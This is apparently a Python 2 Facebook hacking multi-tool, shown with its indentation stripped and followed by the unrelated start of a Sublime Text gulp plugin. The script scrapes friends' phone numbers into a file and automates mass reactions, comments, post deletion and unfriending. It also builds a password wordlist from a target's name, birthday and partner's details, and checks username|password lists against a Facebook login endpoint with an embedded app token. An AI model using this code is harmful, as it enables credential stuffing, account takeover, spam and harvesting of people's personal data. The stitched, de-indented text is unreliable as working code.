print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
gulp.py
|
import sublime
import sublime_plugin
import traceback
import codecs
import os
from datetime import datetime
from threading import Thread
import json
import webbrowser
is_sublime_text_3 = int(sublime.version()) >= 3000
if is_sublime_text_3:
from .base_command import BaseCommand
from .settings import Settings
from .progress_notifier import ProgressNotifier
